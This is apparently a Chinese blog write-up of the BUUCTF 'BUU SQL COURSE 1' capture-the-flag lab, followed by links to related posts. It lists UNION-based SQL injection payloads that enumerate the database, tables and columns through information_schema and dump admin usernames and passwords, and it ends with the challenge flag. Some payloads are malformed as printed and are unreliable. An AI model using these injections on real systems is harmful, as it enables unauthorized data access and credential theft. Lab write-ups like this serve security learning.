(BUUCTF)BUU SQL COURSE 1

已于 2024-05-04 21:54:15 修改
阅读量1.7k 收藏 15
点赞数 7
文章标签: sql 数据库 php
于 2023-04-28 17:55:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63442046/article/details/130431423
版权

 1.BUU SQL COURSE 1

题目网址:

简单汇总:

数据库名称和用户名称/backend/content_detail.php?id=-1 union select database(),user()
查询admin里的值php?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='news'
暴出字段php?id=-1 union select  1,group_concat(column_name)  information_schema.columns from new where table_name='admin' 
暴出密码php?id=-1 union select 1,group_concat(username,password) from news.admin

打开网址,发现是一个这样的网站,这里题目很明确提示了是SQL注入类型,于是就看它传递的参数包,如下

发现在点开三个测试新闻发现传递的1数据包都存在SQL注入,于是修改参数执行SQL注入:

发现在修改参数时页面回显的参数不一样,进一步证明存在。于是利用order   by进行字段查看,发现到3就没有回显。于是可以进行暴库等操作:

 

  • /backend/content_detail.php?id=-1 union select database(),user()

------得到数据库名称和用户名称

  通过查询名为news的数据库得到两个表:

  • php?id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='news'

------显而易见要查询admin里的值

暴字段:

php?id=-1 union select  1,group_concat(column_name)  information_schema.columns from new where table_name='admin' 

 

暴出密码:

  • php?id=-1 union select 1,group_concat(username,password) from admin

 

然后用暴出的username和password可以尝试登录:

 

成功得到flag!

flag{e827fcd6-7a4f-4d80-a9a5-4bd3203c963c}

Jaaay..
关注
  • 7
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
1ncrd#Study-Record#BUUCTF[第二章 web进阶]XSS闯关1.md
08-10
一些关于xss的payload
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
BUU SQL COURSE 1 1(SQL注入)
小谢的博客
10-25 3075
BUU SQL COURSE 1 1(SQL注入)题解
2024年最全BUUCTF BUU SQL COURSE 1_ctf sql 只提示用户名或密码错误(2),【面试必备
2301_79098336的博客
05-05 674
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
BUUCTF Basic学习笔记
qq_57002412的博客
06-18 876
本题的考点在与ssh的运用知识储备题解已知域名 端口 用户名 密码!可使用ssh命令登陆:后使用root权限,在Linux lab里寻找flag相关文件​ 题解。
BUUCTF/BUU SQL COURSE 1
weixin_44041994的博客
03-19 507
登录按钮点击后是一个登陆界面,随意输入字符点击后显示提示信息"用户名或密码错误",并且抓包发现是提交的POST请求,可以对该登录界面进行暴破操作,但是因为需要猜解两个字段内容且密码内容无提示,时间需求比较久,且需要较庞大的字典。通过判断可知contents表应为热点新闻的数据表,admin大概率为用户表,所以我们构建sql根据表名查询该表下的各字段名,成功得到字段名:id,username,password。热点按钮显示热点列表,有三个新闻,里面只有无意义的字符串,但是地址栏显示了/content/1。
2024年最全BUUCTF BUU SQL COURSE 1_ctf sql 只提示用户名或密码错误(1),2024年最新6年菜鸟开发面试字节跳动网络安全研发岗
2401_84132685的博客
05-05 673
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
Buuctf | BUU SQL COURSE 1
m_de_g的博客
12-27 6314
BUU SQL COURSE 1 一、题目下载 https://buuoj.cn/challenges#BUU%20SQL%20COURSE%201 二、实战化演练 1.直接使用弱口令来进行测试 2.经过多次的测试,都无法注入,说明这个是写死的注册和登录,左边不是有热点吗?查看了一下跳转 3.通过访问backend/content_detail.php?id=1 4.通过修改后面的id=1,2,3,均会返回信息,直接使用SQL查询语句 1 and 1=1 5.我们尝试使用 1 and 1=2
BUUCTF basic BUU SQL COURSE 1
网安小趴菜
08-25 1111
BUUCTF basic BUU SQL COURSE 1
BUUCTF BUU SQL COURSE 1_ctf sql 只提示用户名或密码错误
m0_58269520的博客
04-05 778
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
BUUCTFBUU SQL COURSE 1 1
qq_41369524的博客
12-10 1413
进到burp里面看:id=1,id=2。推断可能是根据SQL查询得到的不同界面结果。例如select * from 表名 where id=1;再试一次,发现原来是之前粘贴少了一个字母,成功拿到flag。试试3,试试2,发现2有回显,所以试探出该表有两列。看到了username和password。先审题,题目名字应该是关于SQL注入的。没有结果,考虑一下MD5解密,解不了。在界面随便点点,发现是POST。首先,判断其是字符型还是数字型。返回结果相同,所以是数字型。得到用户名是admin。
BUU SQL COURSE 1
qq_62984336的博客
03-23 1719
BUU SQL COURSE 1 1.打开每一个网页都遛了一遍,没发现什么,但是在f12的网络里找到了端倪,明显是个注入点 2.访问页面后开始注入(注意要把#的地方换成backend查看后台数据,不然可能看不到回显) 先测试回显位置 id=1 order by 1 id=1 order by 2 id=1 order by 3//开始没有回显 然后开始注入 ?id=0 union select 1,group_concat(table_name) from informatio.
BUU 论坛的编辑器163Editor
09-21
1. **result.asp**:这可能是一个ASP(Active Server Pages)脚本文件,通常用于服务器端处理用户请求。在编辑器的上下文中,它可能是用来处理用户通过编辑器提交的富文本内容,例如进行数据格式转换或存储到数据库...
POSN:POSN-BUU的源代码
04-01
1. **面向对象编程**:C++支持面向对象编程(OOP),这可能意味着代码中包含多个类,每个类代表了系统中的一个实体或功能,如定位器、传感器、数据处理器等。类之间可能存在继承、封装和多态性等特性。 2. **模板和...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
SQL Server内置的HTAP技术
2401_85789772的博客
07-22 653
假设用户建了一个行存索引和列存索引组合的表,事务插入数据时,会同时插入行存和Delta Store,Delta Store达到100W行阈值后冻结,tuple-mover后台线程会将其中较冷的数据迁移到Main Store,无论是过去的传统数仓,还是现在的大数据技术栈,都存在这个时效性问题。根据数仓场景的特点,SQL Server列存的开销其实可以接受,然后使用类Delta-Main架构也是比较主流的做法,但是到了HTAP的场景,整个数据库需要支撑高并发的查询和更新,列存的开销就会被放大。
如何发现快速发现分析生产问题SQL
qq_34249468的博客
07-22 873
如何发现快速发现分析生产问题SQL
前台文本直接取数据库值doFieldSQL插入SQL
最新发布
qq_34276316的博客
07-22 351
实现功能:根据选择的车间主任带出角色。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值